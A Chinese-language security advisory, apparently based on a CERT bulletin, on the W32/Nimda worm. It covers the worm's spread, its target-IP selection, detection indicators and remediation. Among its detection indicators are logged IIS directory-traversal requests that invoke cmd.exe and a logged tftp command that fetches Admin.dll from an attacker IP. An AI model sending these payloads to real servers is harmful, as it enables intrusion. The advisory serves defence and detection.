详细: CERT 发布安全公告,指出发现一种新的蠕虫,叫做 "W32/Nimda" 或 "Concept Virus (CV) v.5 " 该蠕虫的传播机制有许多种: 1)通过 EMAIL 从客户端到客户端传播 2)通过网络共享从客户端到客户端传播 3)从 WEB 服务器传播到客户端(通过浏览受影响站点) 4)通过动态扫描和利用 "Microsoft IIS 4.0 / 5.0 directory traversal" 从客户端到 WEB 服务器端传播。 5)通过扫描 "Code Red II" , "sadmind/IIS" 蠕虫留下的后门程序实现从客户端到 WEB 服务器端的传播
EMAIL 传播和 Browser 传播:
Nimda 蠕虫以 MIME "multipart/alternative" 信息的形式传播,包括两个部分。
第一部分被定义为 MIME 类型 "text/html", 但它并不含有文本信息,因此 EMAIL 显得没有内容。
第二部分被定义为 MIME 类型 "audio/x-wav" ,但却包含一个名为 "readme.exe" 的可执行文件。 利用嵌入 MIME 类型的自动执行漏洞(http://www.cert.org/advisories/CA-2001-06.html), 运行于 X86 平台,使用 Microsoft Internet Explorer 5.5 SP1 或更早版本的 MAIL 程序将会自动运行附件,从而被感染上蠕虫。 该蠕虫也含有每隔10天便自动重发的传播代码。
它利用两个途径来收集目标 EMAIL 地址: 用户 WEB 缓存文件夹中的 .htm 和 .html 文件。 通过 MAPI 服务取得的用户邮件信息内容。
客户机主要扫描被 Code Red II,sadmind/IIS 感染过后留下的后门程序和 IIS 目录遍历漏洞。
对于目标IP的选定,它有以下规律: 50%的时间带有和传播机前两个八位字节的IP会被选定。 25%的时间带有和传播机前一个八位字节的IP会被选定。 25%的时间是一个随机地址会被选定。
受感染客户机会通过 TFTP 复制 Nimda 蠕虫到任何有漏洞的服务器。
一旦感染了服务器,蠕虫会遍历每个系统目录,并使用 .eml 或 .nws 扩展名复制自身。 当发现含有 WEB 内容(例如 HTML or ASP 文件)的目录,它会将下面的 Javascript 附带在每一个这些 WEB 相关文件后:
这样,通过 WEB 浏览或网络文件系统的浏览,蠕虫会感染更多的客户端。
Nimda 蠕虫的扫描行为会产生下面的日志记录:
GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
头四个试图连接 Code Red II 留下的后门程序,后面的试图利用目录遍历漏洞。
如果攻击成功,攻击者能以 LocalSystem 身份在 IIS 服务器上执行任意代码。 对于客户端来说,蠕虫能以触发用户的身份执行任意代码。
Nimda 蠕虫的扫描行为会消耗带宽而导致受影响机器拒绝服务
受影响系统: Microsoft Windows 95, 98, ME, NT, and 2000
解决方案: 一、对于 IIS 服务器,
存在 root.exe 文件,表明存有后门程序,易受感染。 在 c:\, d:\, or e:\ 的根目录中存在 Admin.dll 文件。 目录中出现来历不明的 eml or .nws 文件。 在 IIS 日志文件中有:/c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 此处x.x.x.x表示攻击IP,200表示攻击成功
对于受影响机器,唯一安全的恢复方案是格式化硬盘,从可信息介质(如:CD-ROM)中重装系统,然后打上所有补丁。 此漏洞相关补丁: http://www.cnns.net/article/db/1765.htm http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
二、对于终端用户来说:
1、下载安装补丁或采用不受影响版本,相关信息请参考: http://www.cnns.net/article/db/1393.htm microsoft.com/technet/security/bulletin/MS01-020.asp
2、运行反病毒软件或更新病毒码
3、不要随便打开 EMAIL 附件
4、关闭 JavaScript
|